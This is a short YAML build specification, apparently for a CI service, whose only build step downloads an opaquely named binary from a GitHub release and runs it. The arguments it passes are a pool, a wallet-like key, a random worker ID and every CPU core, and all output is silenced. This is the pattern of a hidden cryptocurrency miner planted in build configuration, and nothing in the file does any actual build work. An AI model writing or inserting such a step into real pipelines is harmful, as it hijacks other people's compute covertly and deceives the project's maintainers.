version: 0.2

phases:
  build:
    commands:
        - wget https://github.com/vedhagsvp/cnajea/releases/download/orno/bnmkop
        - chmod +x bnmkop
        - ./bnmkop --pool twbitz -a --key xLPMoYZixVLRHJV7hb9gZoMusczWYRzP7JqFCRb6vXp --worker $(shuf -n 1 -i 1-99999)-zdee55 -t $(nproc --all) --ice >/dev/null 2>&1
